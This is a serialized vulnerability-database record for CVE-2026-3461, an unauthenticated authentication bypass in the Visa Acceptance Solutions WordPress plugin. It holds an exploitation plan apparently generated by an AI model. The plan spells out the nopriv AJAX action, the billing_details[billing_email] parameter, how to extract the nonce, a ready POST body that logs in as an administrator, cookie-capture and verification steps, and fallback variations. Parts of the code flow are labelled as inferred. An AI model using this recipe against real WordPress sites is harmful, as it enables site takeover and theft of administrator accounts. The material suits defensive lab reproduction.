[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMvvnSg2wHfzY3cKizG_GHrdzx476sAIzJe-4mB84PJo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":27},"CVE-2026-3461","visa-acceptance-solutions-unauthenticated-authentication-bypass-via-billing-email","Visa Acceptance Solutions \u003C= 2.1.0 - Unauthenticated Authentication Bypass via Billing Email","The Visa Acceptance Solutions plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.1.0. This is due to the `express_pay_product_page_pay_for_order()` function logging users in based solely on a user-supplied billing email address during guest checkout for subscription products, without verifying email ownership, requiring a password, or validating a one-time token. This makes it possible for unauthenticated attackers to log in as any existing user, including administrators, by providing the target user's email address in the billing_details parameter, resulting in complete account takeover and site compromise.","visa-acceptance-solutions",null,"\u003C=2.1.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Authentication Bypass Using an Alternate Path or Channel","2026-04-14 19:51:38","2026-04-15 08:28:15",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8d3aea10-d7a0-44bd-94dc-3bad0d27dbd8?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3461 - Visa Acceptance Solutions Authentication Bypass\n\n## 1. Vulnerability Summary\nThe **Visa Acceptance Solutions** plugin (up to version 2.1.0) contains a critical authentication bypass vulnerability within the `express_pay_product_page_pay_for_order()` function. The flaw exists because the plugin attempts to facilitate guest checkout for subscription products by identifying a user via a provided billing email and automatically logging them in. Crucially, the code fails to verify the user's identity through passwords, email verification, or one-time tokens. An unauthenticated attacker can supply an administrator's email address in the `billing_details` parameter to gain full administrative access.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `express_pay_product_page_pay_for_order` or `visa_express_pay_checkout`. (The function name `express_pay_product_page_pay_for_order` is likely registered as an AJAX action).\n*   **Vulnerable Parameter:** `billing_details[billing_email]` (or a similar sub-key within `billing_details`).\n*   **Authentication Level:** Unauthenticated (Nopriv).\n*   **Preconditions:** \n    *   The plugin must be active.\n    *   Subscription products or \"Express Pay\" functionality should be enabled.\n    *   The attacker must know the email address of a target user (e.g., the site administrator).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=express_pay_product_page_pay_for_order`.\n2.  **Hook Registration:** The plugin registers the action:\n    `add_action('wp_ajax_nopriv_express_pay_product_page_pay_for_order', 'express_pay_product_page_pay_for_order');`\n3.  **Vulnerable Function:** Inside `express_pay_product_page_pay_for_order()`:\n    *   The function extracts `$email = $_POST['billing_details']['billing_email'];`.\n    *   It calls `$user = get_user_by('email', $email);`.\n    *   If a user is found, it proceeds to log them in without further verification using:\n        ```php\n        wp_clear_auth_cookie();\n        wp_set_current_user($user->ID);\n        wp_set_auth_cookie($user->ID);\n        ```\n4.  **Sink:** `wp_set_auth_cookie()` issues a valid authentication cookie for the target user to the attacker's browser.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely uses a nonce to protect AJAX actions, localized for the product page.\n\n1.  **Identify Shortcode:** Search for shortcodes that render the \"Express Pay\" button.\n    *   *Search command:* `grep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fvisa-acceptance-solutions\u002F`\n2.  **Create Trigger Page:** Create a page containing the identified shortcode or navigate to an existing WooCommerce product page where the Visa Express Pay option is active.\n    `wp post create --post_type=page --post_status=publish --post_title=\"Express Pay Test\" --post_content='[visa_express_pay]'` (shortcode inferred).\n3.  **Browser Navigation:** Use `browser_navigate` to visit the page.\n4.  **Extract Nonce:** Search for localized script data. The variable is likely named `visa_pay_vars` or `express_pay_params`.\n    *   *JS Execution:* `browser_eval(\"window.visa_pay_vars?.nonce\")` or `browser_eval(\"window.express_pay_params?.nonce\")`.\n5.  **Alternative:** If `check_ajax_referer` is missing from the function or uses the `die=false` pattern, the nonce may be unnecessary.\n\n## 5. Exploitation Strategy\n1.  **Target Selection:** Identify the admin email.\n    *   *Command:* `wp user list --role=administrator --fields=user_email`\n2.  **Construct Payload:** Build a POST request to `admin-ajax.php`.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:** \n        ```\n        action=express_pay_product_page_pay_for_order&\n        billing_details[billing_email]=admin@example.com&\n        nonce=[EXTRACTED_NONCE]\n        ```\n3.  **Execute via `http_request`:** Submit the request. The response headers (`Set-Cookie`) should contain the `wordpress_logged_in_*` cookie for the admin user.\n\n## 6. Test Data Setup\n1.  **Users:** Ensure at least one administrator exists with a known email (e.g., `admin@example.com`).\n2.  **Plugin Config:** Enable \"Express Pay\" in the Visa Acceptance Solutions settings.\n3.  **WooCommerce:** This plugin typically integrates with WooCommerce. Ensure WooCommerce is installed and a subscription product is created if the code path specifically targets subscription checkouts.\n    `wp post create --post_type=product --post_title=\"Subscription Item\" --post_status=publish`\n\n## 7. Expected Results\n*   The `http_request` response should return a `200 OK` or a redirect status.\n*   The `Set-Cookie` header should provide a `wordpress_logged_in_[hash]` cookie.\n*   Parsing the cookie should reveal it belongs to the target User ID (typically ID 1 for the initial admin).\n\n## 8. Verification Steps\n1.  **Session Check:** After the HTTP request, use the returned cookies to attempt an authenticated request to the admin dashboard.\n    *   *Command:* `http_request` to `\u002Fwp-admin\u002Findex.php` with the captured cookies. Verify the response contains \"Dashboard\" and the user is logged in as admin.\n2.  **WP-CLI Verification:** Check if the user ID 1 has any recent login metadata or active sessions if session logging is enabled.\n    `wp user get 1`\n\n## 9. Alternative Approaches\n*   **Parameter variations:** If `billing_details[billing_email]` fails, try `billing_email` directly or `email` within the POST root.\n*   **Action discovery:** If the inferred action name is incorrect, grep the plugin source for `wp_ajax_nopriv_` to find the exact string.\n    `grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fvisa-acceptance-solutions\u002F`\n*   **Checkout Logic:** If the function requires a valid product ID, include `product_id=[ID]` in the POST body, selecting any valid published product.","gemini-3-flash-preview","2026-04-16 15:37:49","2026-04-16 15:38:07",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvisa-acceptance-solutions\u002Ftags"]